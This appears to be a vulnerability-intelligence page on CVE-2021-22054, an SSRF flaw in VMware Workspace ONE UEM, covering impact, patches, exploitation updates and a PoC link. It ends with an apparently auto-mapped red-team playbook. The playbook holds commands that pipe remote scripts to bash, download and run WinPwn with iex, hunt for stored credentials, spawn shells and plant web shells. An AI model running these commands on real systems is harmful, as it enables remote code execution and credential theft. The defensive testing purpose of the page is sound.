CVE-2021-22054
Overview
This vulnerability is a server-side request forgery (SSRF) affecting VMware Workspace ONE UEM console versions prior to specified patch levels. The root cause lies in insufficient validation of user-supplied URLs within the UEM console, allowing crafted requests to be forwarded internally without proper authentication. The affected component is the Workspace ONE UEM console's network request handling functionality, which processes external input to generate internal HTTP requests.
Vulnerability Description
VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain an SSRF vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information.
Impact
An unauthenticated attacker with network access to the VMware Workspace ONE UEM console can exploit this SSRF vulnerability to send arbitrary HTTP requests to internal systems, potentially accessing sensitive information not normally exposed externally. This can lead to unauthorized disclosure of internal network resources and data. No user interaction or valid credentials are required, enabling attackers to probe internal services and gather intelligence for further attacks, increasing the risk of lateral movement within the network.
Solution
VMware has released security updates addressing this SSRF vulnerability in Workspace ONE UEM console versions 20.0.8.37, 20.11.0.40, 21.2.0.27, and 21.5.0.37 as detailed in advisory VMSA-2021-0029. Administrators should apply these specific patches to affected versions promptly. For detailed patching instructions and additional mitigation guidance, refer to the official VMware security advisory at https://www.vmware.com/security/advisories/VMSA-2021-0029.html.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in VMware Workspace ONE UEM console versions prior to specified updates is categorized as a Server-Side Request Forgery (SSRF). This type of vulnerability allows an attacker to manipulate server-side requests to access internal resources that should otherwise be protected. In this instance, a malicious actor with network access to the Unified Endpoint Management (UEM) console can craft requests that bypass authentication mechanisms. The flaw arises from improper validation of user-supplied input, enabling attackers to send requests to internal services that are not exposed to the public internet. This can lead to unauthorized access to sensitive information, including internal APIs and databases, which could be exploited for further attacks.
Attack vectors exploiting this SSRF vulnerability can vary significantly. An attacker could leverage the UEM console's functionality to send crafted requests to internal services, potentially accessing metadata services, databases, or other critical components within the network. For instance, if the UEM console is configured to communicate with a backend service for user authentication or data retrieval, an attacker could manipulate the request to extract sensitive data or perform actions that compromise the integrity of the system. Scenarios may include retrieving sensitive configuration files, accessing internal APIs that expose user data, or even executing commands on internal servers if they are misconfigured to allow such actions.
The real-world impact of this vulnerability is substantial, particularly for organizations relying on VMware Workspace ONE for endpoint management. The potential for unauthorized access to sensitive information poses significant business risks, including data breaches, loss of customer trust, and regulatory penalties. Organizations may face operational disruptions if internal systems are compromised, leading to downtime and financial losses. Furthermore, the exploitation of this vulnerability could serve as a foothold for attackers to escalate privileges and move laterally within the network, increasing the overall threat landscape for the organization.
To detect and mitigate the risks associated with this SSRF vulnerability, organizations should implement a multi-faceted approach. First, it is crucial to apply the latest security patches provided by VMware to ensure that the UEM console is updated to a secure version. Regularly reviewing and updating software components is a fundamental practice in maintaining a secure environment. Additionally, organizations should conduct thorough security assessments, including penetration testing and vulnerability scanning, to identify and remediate any potential weaknesses in their configurations. Implementing network segmentation can also help limit the impact of such vulnerabilities by restricting access to sensitive internal services from the UEM console.
Furthermore, organizations should establish robust monitoring and logging practices to detect unusual or unauthorized requests originating from the UEM console. This includes setting up alerts for anomalous behavior that could indicate an exploitation attempt. Employing a Web Application Firewall (WAF) can provide an additional layer of protection by filtering and monitoring HTTP requests to prevent malicious payloads from reaching the application. By adopting these detection and mitigation strategies, organizations can significantly reduce their exposure to the risks associated with this vulnerability and enhance their overall security posture.
CSURFACE threat intelligence has identified a marked escalation in exploitation activity targeting CVE-2021-22054, coinciding with the emergence of publicly available proof-of-concept exploit code on GitHub. This development has broadened the exploit landscape, lowering the barrier for threat actors to weaponize the SSRF vulnerability in VMware Workspace ONE UEM consoles. Our telemetry indicates a significant uptick in detection events consistent with attempted exploitation, reflecting increased adversary interest and operationalization. The addition of this vulnerability to the CISA KEV catalog further underscores its criticality and the urgency for defenders to prioritize monitoring efforts. The updated CVSS score of 7.5 and a high EPSS rating near 0.98 confirm that the risk level has escalated to high, with exploitation becoming more feasible and likely. Consequently, organizations relying on affected VMware UEM versions face an elevated threat environment that demands heightened vigilance.
Update 2 — July 08, 2026
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2021-22054, with our telemetry indicating a sustained increase in exploitation attempts targeting VMware Workspace ONE UEM consoles. This uptick aligns with the recent inclusion of the vulnerability in the CISA KEV catalog, which appears to have heightened adversary focus and operational deployment. Although the EPSS score remains stable at a high level, the growing volume and persistence of probing efforts suggest that exploitation is becoming more accessible and widespread within threat actor communities. The emergence of new proof-of-concept SSRF payloads further lowers the barrier for attackers, increasing the likelihood of successful intrusions. Consequently, the threat landscape for affected VMware UEM versions has intensified, underscoring the critical need for defenders to maintain vigilant monitoring and incident response readiness.
Affected Products (4)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Vmware | Workspace One Uem Console | All |
cpe:2.3:a:vmware:workspace_one_uem_console:*:*:*:*:*:*:*:*
|
|
|
Vmware | Workspace One Uem Console | All |
cpe:2.3:a:vmware:workspace_one_uem_console:*:*:*:*:*:*:*:*
|
|
|
Vmware | Workspace One Uem Console | All |
cpe:2.3:a:vmware:workspace_one_uem_console:*:*:*:*:*:*:*:*
|
|
|
Vmware | Workspace One Uem Console | All |
cpe:2.3:a:vmware:workspace_one_uem_console:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
MKSx/CVE-2021-22054
Generate SSRF payloads
|
MKSx | 5 | 0 | 2022-06-03 | View |
Threat Feed
10 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-664 | Server Side Request Forgery |
30%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-22054 |
| vmware.com |
GitHub CVE
x_refsource_MISC
|
https://www.vmware.com/security/advisories/VMSA-2021-0029.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-22054 |
| greynoise.io |
NVD API
Third Party Advisory
|
https://www.greynoise.io/blog/new-ssrf-exploitation-surge |